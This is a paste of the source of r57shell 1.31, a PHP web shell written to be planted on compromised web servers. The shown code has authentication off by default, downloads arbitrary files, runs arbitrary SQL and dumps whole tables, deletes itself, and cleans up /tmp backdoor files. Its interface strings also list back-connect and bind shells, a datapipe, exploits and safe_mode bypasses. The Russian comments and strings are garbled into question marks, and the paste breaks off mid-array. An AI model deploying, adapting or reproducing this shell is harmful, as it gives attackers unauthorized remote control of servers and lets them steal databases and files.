· 5 years ago · Feb 01, 2020, 09:26 PM
1<?php
2/******************************************************************************************************/
3/*
4/* # # # #
5/* # # # #
6/* # # # #
7/* # ## #### ## #
8/* ## ## ###### ## ##
9/* ## ## ###### ## ##
10/* ## ## #### ## ##
11/* ### ############ ###
12/* ########################
13/* ##############
14/* ######## ########## #######
15/* ### ## ########## ## ###
16/* ### ## ########## ## ###
17/* ### # ########## # ###
18/* ### ## ######## ## ###
19/* ## # ###### # ##
20/* ## # #### # ##
21/* ## ##
22/*
23/*
24/*
25/* r57shell.php - ?????? ?? ??? ??????????? ??? ????????? ????????? ??????? ?? ??????? ????? ???????
26/* ?? ?????? ??????? ????? ?????? ?? ????? ?????: http://rst.void.ru
27/* ??????: 1.31
28/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
29/* ????????? ????????????? ?? ?????? ? ????: blf, phoenix, virus, NorD ? ???? ?????? ?? RST/GHC.
30/* ???? ? ??? ???? ?????-???? ???? ?? ?????? ???? ????? ??????? ??????? ???????? ? ?????? ?? ??????
31/* ?? rst@void.ru. ??? ??????????? ????? ???????????.
32/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
33/* (c)oded by 1dt.w0lf
34/* RST/GHC http://rst.void.ru , http://ghc.ru
35/* ANY MODIFIED REPUBLISHING IS RESTRICTED
36/******************************************************************************************************/
37/* ~~~ ????????? | Options ~~~ */
38
39// ????? ????? | Language
40// $language='ru' - ??????? (russian)
41// $language='eng' - english (??????????)
42$language='eng';
43
44// ?????????????? | Authentification
45// $auth = 1; - ?????????????? ???????? ( authentification = On )
46// $auth = 0; - ?????????????? ????????? ( authentification = Off )
47$auth = 0;
48
49// ????? ? ?????? ??? ??????? ? ??????? (Login & Password for access)
50// ?? ???????? ??????? ????? ??????????? ?? ???????!!! (CHANGE THIS!!!)
51// ????? ? ?????? ????????? ? ??????? ????????? md5, ???????? ?? ????????? 'r57'
52// Login & password crypted with md5, default is 'r57'
53$name='ec371748dc2da624b35a4f8f685dd122'; // ????? ???????????? (user login)
54$pass='ec371748dc2da624b35a4f8f685dd122'; // ?????? ???????????? (user password)
55/******************************************************************************************************/
56error_reporting(0);
57set_magic_quotes_runtime(0);
58@set_time_limit(0);
59@ini_set('max_execution_time',0);
60@ini_set('output_buffering',0);
61$safe_mode = @ini_get('safe_mode');
62$version = '1.31';
63if(version_compare(phpversion(), '4.1.0') == -1)
64 {
65 $_POST = &$HTTP_POST_VARS;
66 $_GET = &$HTTP_GET_VARS;
67 $_SERVER = &$HTTP_SERVER_VARS;
68 $_COOKIE = &$HTTP_COOKIE_VARS;
69 }
70if (@get_magic_quotes_gpc())
71 {
72 foreach ($_POST as $k=>$v)
73 {
74 $_POST[$k] = stripslashes($v);
75 }
76 foreach ($_COOKIE as $k=>$v)
77 {
78 $_COOKIE[$k] = stripslashes($v);
79 }
80 }
81
82if($auth == 1) {
83if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
84 {
85 header('WWW-Authenticate: Basic realm="r57shell"');
86 header('HTTP/1.0 401 Unauthorized');
87 exit("<b><a href=http://rst.void.ru>r57shell</a> : Access Denied</b>");
88 }
89}
90$head = '<!-- ??????????, ???? -->
91<html>
92<head>
93<title>r57shell</title>
94<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
95
96<STYLE>
97tr {
98BORDER-RIGHT: #aaaaaa 1px solid;
99BORDER-TOP: #eeeeee 1px solid;
100BORDER-LEFT: #eeeeee 1px solid;
101BORDER-BOTTOM: #aaaaaa 1px solid;
102color: #000000;
103}
104td {
105BORDER-RIGHT: #aaaaaa 1px solid;
106BORDER-TOP: #eeeeee 1px solid;
107BORDER-LEFT: #eeeeee 1px solid;
108BORDER-BOTTOM: #aaaaaa 1px solid;
109color: #000000;
110}
111.table1 {
112BORDER: 0px;
113BACKGROUND-COLOR: #D4D0C8;
114color: #000000;
115}
116.td1 {
117BORDER: 0px;
118font: 7pt Verdana;
119color: #000000;
120}
121.tr1 {
122BORDER: 0px;
123color: #000000;
124}
125table {
126BORDER: #eeeeee 1px outset;
127BACKGROUND-COLOR: #D4D0C8;
128color: #000000;
129}
130input {
131BORDER-RIGHT: #ffffff 1px solid;
132BORDER-TOP: #999999 1px solid;
133BORDER-LEFT: #999999 1px solid;
134BORDER-BOTTOM: #ffffff 1px solid;
135BACKGROUND-COLOR: #e4e0d8;
136font: 8pt Verdana;
137color: #000000;
138}
139select {
140BORDER-RIGHT: #ffffff 1px solid;
141BORDER-TOP: #999999 1px solid;
142BORDER-LEFT: #999999 1px solid;
143BORDER-BOTTOM: #ffffff 1px solid;
144BACKGROUND-COLOR: #e4e0d8;
145font: 8pt Verdana;
146color: #000000;;
147}
148submit {
149BORDER: buttonhighlight 2px outset;
150BACKGROUND-COLOR: #e4e0d8;
151width: 30%;
152color: #000000;
153}
154textarea {
155BORDER-RIGHT: #ffffff 1px solid;
156BORDER-TOP: #999999 1px solid;
157BORDER-LEFT: #999999 1px solid;
158BORDER-BOTTOM: #ffffff 1px solid;
159BACKGROUND-COLOR: #e4e0d8;
160font: Fixedsys bold;
161color: #000000;
162}
163BODY {
164margin: 1px;
165color: #000000;
166background-color: #e4e0d8;
167}
168A:link {COLOR:red; TEXT-DECORATION: none}
169A:visited { COLOR:red; TEXT-DECORATION: none}
170A:active {COLOR:red; TEXT-DECORATION: none}
171A:hover {color:blue;TEXT-DECORATION: none}
172</STYLE>
173<script language=\'javascript\'>
174function hide_div(id)
175{
176 document.getElementById(id).style.display = \'none\';
177 document.cookie=id+\'=0;\';
178}
179function show_div(id)
180{
181 document.getElementById(id).style.display = \'block\';
182 document.cookie=id+\'=1;\';
183}
184function change_divst(id)
185{
186 if (document.getElementById(id).style.display == \'none\')
187 show_div(id);
188 else
189 hide_div(id);
190}
191</script>';
192class zipfile
193{
194 var $datasec = array();
195 var $ctrl_dir = array();
196 var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
197 var $old_offset = 0;
198 function unix2DosTime($unixtime = 0) {
199 $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
200 if ($timearray['year'] < 1980) {
201 $timearray['year'] = 1980;
202 $timearray['mon'] = 1;
203 $timearray['mday'] = 1;
204 $timearray['hours'] = 0;
205 $timearray['minutes'] = 0;
206 $timearray['seconds'] = 0;
207 }
208 return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
209 ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
210 }
211 function addFile($data, $name, $time = 0)
212 {
213 $name = str_replace('\\', '/', $name);
214 $dtime = dechex($this->unix2DosTime($time));
215 $hexdtime = '\x' . $dtime[6] . $dtime[7]
216 . '\x' . $dtime[4] . $dtime[5]
217 . '\x' . $dtime[2] . $dtime[3]
218 . '\x' . $dtime[0] . $dtime[1];
219 eval('$hexdtime = "' . $hexdtime . '";');
220 $fr = "\x50\x4b\x03\x04";
221 $fr .= "\x14\x00";
222 $fr .= "\x00\x00";
223 $fr .= "\x08\x00";
224 $fr .= $hexdtime;
225 $unc_len = strlen($data);
226 $crc = crc32($data);
227 $zdata = gzcompress($data);
228 $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
229 $c_len = strlen($zdata);
230 $fr .= pack('V', $crc);
231 $fr .= pack('V', $c_len);
232 $fr .= pack('V', $unc_len);
233 $fr .= pack('v', strlen($name));
234 $fr .= pack('v', 0);
235 $fr .= $name;
236 $fr .= $zdata;
237 $this -> datasec[] = $fr;
238 $cdrec = "\x50\x4b\x01\x02";
239 $cdrec .= "\x00\x00";
240 $cdrec .= "\x14\x00";
241 $cdrec .= "\x00\x00";
242 $cdrec .= "\x08\x00";
243 $cdrec .= $hexdtime;
244 $cdrec .= pack('V', $crc);
245 $cdrec .= pack('V', $c_len);
246 $cdrec .= pack('V', $unc_len);
247 $cdrec .= pack('v', strlen($name) );
248 $cdrec .= pack('v', 0 );
249 $cdrec .= pack('v', 0 );
250 $cdrec .= pack('v', 0 );
251 $cdrec .= pack('v', 0 );
252 $cdrec .= pack('V', 32 );
253 $cdrec .= pack('V', $this -> old_offset );
254 $this -> old_offset += strlen($fr);
255 $cdrec .= $name;
256 $this -> ctrl_dir[] = $cdrec;
257 }
258 function file()
259 {
260 $data = implode('', $this -> datasec);
261 $ctrldir = implode('', $this -> ctrl_dir);
262 return
263 $data .
264 $ctrldir .
265 $this -> eof_ctrl_dir .
266 pack('v', sizeof($this -> ctrl_dir)) .
267 pack('v', sizeof($this -> ctrl_dir)) .
268 pack('V', strlen($ctrldir)) .
269 pack('V', strlen($data)) .
270 "\x00\x00";
271 }
272}
273function compress(&$filename,&$filedump,$compress)
274 {
275 global $content_encoding;
276 global $mime_type;
277 if ($compress == 'bzip' && @function_exists('bzcompress'))
278 {
279 $filename .= '.bz2';
280 $mime_type = 'application/x-bzip2';
281 $filedump = bzcompress($filedump);
282 }
283 else if ($compress == 'gzip' && @function_exists('gzencode'))
284 {
285 $filename .= '.gz';
286 $content_encoding = 'x-gzip';
287 $mime_type = 'application/x-gzip';
288 $filedump = gzencode($filedump);
289 }
290 else if ($compress == 'zip' && @function_exists('gzcompress'))
291 {
292 $filename .= '.zip';
293 $mime_type = 'application/zip';
294 $zipfile = new zipfile();
295 $zipfile -> addFile($filedump, substr($filename, 0, -4));
296 $filedump = $zipfile -> file();
297 }
298 else
299 {
300 $mime_type = 'application/octet-stream';
301 }
302 }
303function mailattach($to,$from,$subj,$attach)
304 {
305 $headers = "From: $from\r\n";
306 $headers .= "MIME-Version: 1.0\r\n";
307 $headers .= "Content-Type: ".$attach['type'];
308 $headers .= "; name=\"".$attach['name']."\"\r\n";
309 $headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
310 $headers .= chunk_split(base64_encode($attach['content']))."\r\n";
311 if(@mail($to,$subj,"",$headers)) { return 1; }
312 return 0;
313 }
314class my_sql
315 {
316 var $host = 'localhost';
317 var $port = '';
318 var $user = '';
319 var $pass = '';
320 var $base = '';
321 var $db = '';
322 var $connection;
323 var $res;
324 var $error;
325 var $rows;
326 var $columns;
327 var $num_rows;
328 var $num_fields;
329 var $dump;
330
331 function connect()
332 {
333 switch($this->db)
334 {
335 case 'MySQL':
336 if(empty($this->port)) { $this->port = '3306'; }
337 if(!function_exists('mysql_connect')) return 0;
338 $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);
339 if(is_resource($this->connection)) return 1;
340 break;
341 case 'MSSQL':
342 if(empty($this->port)) { $this->port = '1433'; }
343 if(!function_exists('mssql_connect')) return 0;
344 $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);
345 if($this->connection) return 1;
346 break;
347 case 'PostgreSQL':
348 if(empty($this->port)) { $this->port = '5432'; }
349 $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";
350 if(!function_exists('pg_connect')) return 0;
351 $this->connection = @pg_connect($str);
352 if(is_resource($this->connection)) return 1;
353 break;
354 case 'Oracle':
355 if(!function_exists('ocilogon')) return 0;
356 $this->connection = @ocilogon($this->user, $this->pass, $this->base);
357 if(is_resource($this->connection)) return 1;
358 break;
359 }
360 return 0;
361 }
362
363 function select_db()
364 {
365 switch($this->db)
366 {
367 case 'MySQL':
368 if(@mysql_select_db($this->base,$this->connection)) return 1;
369 break;
370 case 'MSSQL':
371 if(@mssql_select_db($this->base,$this->connection)) return 1;
372 break;
373 case 'PostgreSQL':
374 return 1;
375 break;
376 case 'Oracle':
377 return 1;
378 break;
379 }
380 return 0;
381 }
382
383 function query($query)
384 {
385 $this->res=$this->error='';
386 switch($this->db)
387 {
388 case 'MySQL':
389 if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection)))
390 {
391 $this->error = @mysql_error($this->connection);
392 return 0;
393 }
394 else if(is_resource($this->res)) { return 1; }
395 return 2;
396 break;
397 case 'MSSQL':
398 if(false===($this->res=@mssql_query($query,$this->connection)))
399 {
400 $this->error = 'Query error';
401 return 0;
402 }
403 else if(@mssql_num_rows($this->res) > 0) { return 1; }
404 return 2;
405 break;
406 case 'PostgreSQL':
407 if(false===($this->res=@pg_query($this->connection,$query)))
408 {
409 $this->error = @pg_last_error($this->connection);
410 return 0;
411 }
412 else if(@pg_num_rows($this->res) > 0) { return 1; }
413 return 2;
414 break;
415 case 'Oracle':
416 if(false===($this->res=@ociparse($this->connection,$query)))
417 {
418 $this->error = 'Query parse error';
419 }
420 else
421 {
422 if(@ociexecute($this->res))
423 {
424 if(@ocirowcount($this->res) != 0) return 2;
425 return 1;
426 }
427 $error = @ocierror();
428 $this->error=$error['message'];
429 }
430 break;
431 }
432 return 0;
433 }
434 function get_result()
435 {
436 $this->rows=array();
437 $this->columns=array();
438 $this->num_rows=$this->num_fields=0;
439 switch($this->db)
440 {
441 case 'MySQL':
442 $this->num_rows=@mysql_num_rows($this->res);
443 $this->num_fields=@mysql_num_fields($this->res);
444 while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));
445 @mysql_free_result($this->res);
446 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
447 break;
448 case 'MSSQL':
449 $this->num_rows=@mssql_num_rows($this->res);
450 $this->num_fields=@mssql_num_fields($this->res);
451 while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
452 @mssql_free_result($this->res);
453 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;};
454 break;
455 case 'PostgreSQL':
456 $this->num_rows=@pg_num_rows($this->res);
457 $this->num_fields=@pg_num_fields($this->res);
458 while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
459 @pg_free_result($this->res);
460 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
461 break;
462 case 'Oracle':
463 $this->num_fields=@ocinumcols($this->res);
464 while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;
465 @ocifreestatement($this->res);
466 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
467 break;
468 }
469 return 0;
470 }
471 function dump($table)
472 {
473 if(empty($table)) return 0;
474 $this->dump=array();
475 $this->dump[0] = '##';
476 $this->dump[1] = '## --------------------------------------- ';
477 $this->dump[2] = '## Created: '.date ("d/m/Y H:i:s");
478 $this->dump[3] = '## Database: '.$this->base;
479 $this->dump[4] = '## Table: '.$table;
480 $this->dump[5] = '## --------------------------------------- ';
481 switch($this->db)
482 {
483 case 'MySQL':
484 $this->dump[0] = '## MySQL dump';
485 if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;
486 if(!$this->get_result()) return 0;
487 $this->dump[] = $this->rows[0]['Create Table'];
488 $this->dump[] = '## --------------------------------------- ';
489 if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;
490 if(!$this->get_result()) return 0;
491 for($i=0;$i<$this->num_rows;$i++)
492 {
493 foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);}
494 $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
495 }
496 break;
497 case 'MSSQL':
498 $this->dump[0] = '## MSSQL dump';
499 if($this->query('SELECT * FROM '.$table)!=1) return 0;
500 if(!$this->get_result()) return 0;
501 for($i=0;$i<$this->num_rows;$i++)
502 {
503 foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
504 $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
505 }
506 break;
507 case 'PostgreSQL':
508 $this->dump[0] = '## PostgreSQL dump';
509 if($this->query('SELECT * FROM '.$table)!=1) return 0;
510 if(!$this->get_result()) return 0;
511 for($i=0;$i<$this->num_rows;$i++)
512 {
513 foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
514 $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
515 }
516 break;
517 case 'Oracle':
518 $this->dump[0] = '## ORACLE dump';
519 $this->dump[] = '## under construction';
520 break;
521 default:
522 return 0;
523 break;
524 }
525 return 1;
526 }
527 function close()
528 {
529 switch($this->db)
530 {
531 case 'MySQL':
532 @mysql_close($this->connection);
533 break;
534 case 'MSSQL':
535 @mssql_close($this->connection);
536 break;
537 case 'PostgreSQL':
538 @pg_close($this->connection);
539 break;
540 case 'Oracle':
541 @oci_close($this->connection);
542 break;
543 }
544 }
545 function affected_rows()
546 {
547 switch($this->db)
548 {
549 case 'MySQL':
550 return @mysql_affected_rows($this->res);
551 break;
552 case 'MSSQL':
553 return @mssql_affected_rows($this->res);
554 break;
555 case 'PostgreSQL':
556 return @pg_affected_rows($this->res);
557 break;
558 case 'Oracle':
559 return @ocirowcount($this->res);
560 break;
561 default:
562 return 0;
563 break;
564 }
565 }
566 }
567if(!empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))
568 {
569 if(!$file=@fopen($_POST['d_name'],"r")) { err(1,$_POST['d_name']); $_POST['cmd']=""; }
570 else
571 {
572 @ob_clean();
573 $filename = @basename($_POST['d_name']);
574 $filedump = @fread($file,@filesize($_POST['d_name']));
575 fclose($file);
576 $content_encoding=$mime_type='';
577 compress($filename,$filedump,$_POST['compress']);
578 if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }
579 header("Content-type: ".$mime_type);
580 header("Content-disposition: attachment; filename=\"".$filename."\";");
581 echo $filedump;
582 exit();
583 }
584 }
585if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
586if (!empty($_POST['cmd']) && $_POST['cmd']=="db_query")
587 {
588 echo $head;
589 $sql = new my_sql();
590 $sql->db = $_POST['db'];
591 $sql->host = $_POST['db_server'];
592 $sql->port = $_POST['db_port'];
593 $sql->user = $_POST['mysql_l'];
594 $sql->pass = $_POST['mysql_p'];
595 $sql->base = $_POST['mysql_db'];
596 $querys = @explode(';',$_POST['db_query']);
597 echo '<body bgcolor=#e4e0d8>';
598 if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to SQL server</b></font></div>";
599 else
600 {
601 if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't select database</b></font></div>";
602 else
603 {
604 foreach($querys as $num=>$query)
605 {
606 if(strlen($query)>5)
607 {
608 echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>";
609 switch($sql->query($query))
610 {
611 case '0':
612 echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>";
613 break;
614 case '1':
615 if($sql->get_result())
616 {
617 echo "<table width=100%>";
618 foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);
619 $keys = @implode(" </b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b> ", $sql->columns);
620 echo "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b> ".$keys." </b></font></td></tr>";
621 for($i=0;$i<$sql->num_rows;$i++)
622 {
623 foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);
624 $values = @implode(" </font></td><td><font face=Verdana size=-2> ",$sql->rows[$i]);
625 echo '<tr><td><font face=Verdana size=-2> '.$values.' </font></td></tr>';
626 }
627 echo "</table>";
628 }
629 break;
630 case '2':
631 $ar = $sql->affected_rows()?($sql->affected_rows()):('0');
632 echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>";
633 break;
634 }
635 }
636 }
637 }
638 }
639 echo "<br><form name=form method=POST>";
640 echo in('hidden','db',0,$_POST['db']);
641 echo in('hidden','db_server',0,$_POST['db_server']);
642 echo in('hidden','db_port',0,$_POST['db_port']);
643 echo in('hidden','mysql_l',0,$_POST['mysql_l']);
644 echo in('hidden','mysql_p',0,$_POST['mysql_p']);
645 echo in('hidden','mysql_db',0,$_POST['mysql_db']);
646 echo in('hidden','cmd',0,'db_query');
647 echo "<div align=center>";
648 echo "<font face=Verdana size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>";
649 echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
650 echo "</form>";
651 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
652 }
653if(isset($_GET['delete']))
654 {
655 @unlink(__FILE__);
656 }
657if(isset($_GET['tmp']))
658 {
659 @unlink("/tmp/bdpl");
660 @unlink("/tmp/back");
661 @unlink("/tmp/bd");
662 @unlink("/tmp/bd.c");
663 @unlink("/tmp/dp");
664 @unlink("/tmp/dpc");
665 @unlink("/tmp/dpc.c");
666 }
667if(isset($_GET['phpini']))
668{
669echo $head;
670function U_value($value)
671 {
672 if ($value == '') return '<i>no value</i>';
673 if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
674 if ($value === null) return 'NULL';
675 if (@is_object($value)) $value = (array) $value;
676 if (@is_array($value))
677 {
678 @ob_start();
679 print_r($value);
680 $value = @ob_get_contents();
681 @ob_end_clean();
682 }
683 return U_wordwrap((string) $value);
684 }
685function U_wordwrap($str)
686 {
687 $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
688 return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
689 }
690if (@function_exists('ini_get_all'))
691 {
692 $r = '';
693 echo '<table width=100%>', '<tr><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
694 foreach (@ini_get_all() as $key=>$value)
695 {
696 $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
697 }
698 echo $r;
699 echo '</table>';
700 }
701echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
702die();
703}
704if(isset($_GET['cpu']))
705 {
706 echo $head;
707 echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
708 $cpuf = @file("cpuinfo");
709 if($cpuf)
710 {
711 $c = @sizeof($cpuf);
712 for($i=0;$i<$c;$i++)
713 {
714 $info = @explode(":",$cpuf[$i]);
715 if($info[1]==""){ $info[1]="---"; }
716 $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
717 }
718 echo $r;
719 }
720 else
721 {
722 echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
723 }
724 echo '</table>';
725 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
726 die();
727 }
728if(isset($_GET['mem']))
729 {
730 echo $head;
731 echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
732 $memf = @file("meminfo");
733 if($memf)
734 {
735 $c = sizeof($memf);
736 for($i=0;$i<$c;$i++)
737 {
738 $info = explode(":",$memf[$i]);
739 if($info[1]==""){ $info[1]="---"; }
740 $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
741 }
742 echo $r;
743 }
744 else
745 {
746 echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
747 }
748 echo '</table>';
749 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
750 die();
751 }
752$lang=array(
753'ru_text1' =>'??????????? ???????',
754'ru_text2' =>'?????????? ?????? ?? ???????',
755'ru_text3' =>'????????? ???????',
756'ru_text4' =>'??????? ??????????',
757'ru_text5' =>'???????? ?????? ?? ??????',
758'ru_text6' =>'????????? ????',
759'ru_text7' =>'??????',
760'ru_text8' =>'???????? ?????',
761'ru_butt1' =>'?????????',
762'ru_butt2' =>'?????????',
763'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash',
764'ru_text10'=>'??????? ????',
765'ru_text11'=>'?????? ??? ???????',
766'ru_butt3' =>'???????',
767'ru_text12'=>'back-connect',
768'ru_text13'=>'IP-?????',
769'ru_text14'=>'????',
770'ru_butt4' =>'?????????',
771'ru_text15'=>'???????? ?????? ? ?????????? ???????',
772'ru_text16'=>'????????????',
773'ru_text17'=>'????????? ????',
774'ru_text18'=>'????????? ????',
775'ru_text19'=>'Exploits',
776'ru_text20'=>'????????????',
777'ru_text21'=>'????? ???',
778'ru_text22'=>'datapipe',
779'ru_text23'=>'????????? ????',
780'ru_text24'=>'????????? ????',
781'ru_text25'=>'????????? ????',
782'ru_text26'=>'????????????',
783'ru_butt5' =>'?????????',
784'ru_text28'=>'?????? ? safe_mode',
785'ru_text29'=>'?????? ????????',
786'ru_butt6' =>'???????',
787'ru_text30'=>'???????? ?????',
788'ru_butt7' =>'???????',
789'ru_text31'=>'???? ?? ??????',
790'ru_text32'=>'?????????? PHP ????',
791'ru_text33'=>'???????? ??????????? ?????? ??????????? open_basedir ????? ??????? cURL',
792'ru_butt8' =>'?????????',
793'ru_text34'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ??????? include',
794'ru_text35'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ???????? ????? ? mysql',
795'ru_text36'=>'???? . ???????',
796'ru_text37'=>'?????',
797'ru_text38'=>'??????',
798'ru_text39'=>'????',
799'ru_text40'=>'???? ??????? ???? ??????',
800'ru_butt9' =>'????',
801'ru_text41'=>'????????? ? ?????',
802'ru_text42'=>'?????????????? ?????',
803'ru_text43'=>'????????????? ????',
804'ru_butt10'=>'?????????',
805'ru_butt11'=>'?????????????',
806'ru_text44'=>'?????????????? ????? ??????????! ?????? ?????? ??? ??????!',
807'ru_text45'=>'???? ????????',
808'ru_text46'=>'???????? phpinfo()',
809'ru_text47'=>'???????? ???????? php.ini',
810'ru_text48'=>'???????? ????????? ??????',
811'ru_text49'=>'???????? ??????? ? ???????',
812'ru_text50'=>'?????????? ? ??????????',
813'ru_text51'=>'?????????? ? ??????',
814'ru_text52'=>'????? ??? ??????',
815'ru_text53'=>'?????? ? ?????',
816'ru_text54'=>'????? ?????? ? ??????',
817'ru_butt12'=>'?????',
818'ru_text55'=>'?????? ? ??????',
819'ru_text56'=>'?????? ?? ???????',
820'ru_text57'=>'???????/??????? ????/??????????',
821'ru_text58'=>'???',
822'ru_text59'=>'????',
823'ru_text60'=>'??????????',
824'ru_butt13'=>'???????/???????',
825'ru_text61'=>'???? ??????',
826'ru_text62'=>'?????????? ???????',
827'ru_text63'=>'???? ??????',
828'ru_text64'=>'?????????? ???????',
829'ru_text65'=>'???????',
830'ru_text66'=>'???????',
831'ru_text67'=>'Chown/Chgrp/Chmod',
832'ru_text68'=>'???????',
833'ru_text69'=>'????????1',
834'ru_text70'=>'????????2',
835'ru_text71'=>"?????? ???????? ???????:\r\n- ??? CHOWN - ??? ?????? ???????????? ??? ??? UID (??????) \r\n- ??? ??????? CHGRP - ??? ?????? ??? GID (??????) \r\n- ??? ??????? CHMOD - ????? ????? ? ???????????? ????????????? (???????? 0777)",
836'ru_text72'=>'????? ??? ??????',
837'ru_text73'=>'?????? ? ?????',
838'ru_text74'=>'?????? ? ??????',
839'ru_text75'=>'* ????? ???????????? ?????????? ?????????',
840'ru_text76'=>'????? ?????? ? ?????? ? ??????? ??????? find',
841'ru_text80'=>'???',
842'ru_text81'=>'????',
843'ru_text82'=>'???? ??????',
844'ru_text83'=>'?????????? SQL ???????',
845'ru_text84'=>'SQL ??????',
846'ru_text85'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ?????????? ?????? ? MSSQL ???????',
847'ru_text86'=>'?????????? ????? ? ???????',
848'ru_butt14'=>'???????',
849'ru_text87'=>'?????????? ?????? ? ?????????? ftp-???????',
850'ru_text88'=>'FTP-??????:????',
851'ru_text89'=>'???? ?? ftp ???????',
852'ru_text90'=>'????? ????????',
853'ru_text91'=>'???????????? ?',
854'ru_text92'=>'??? ?????????',
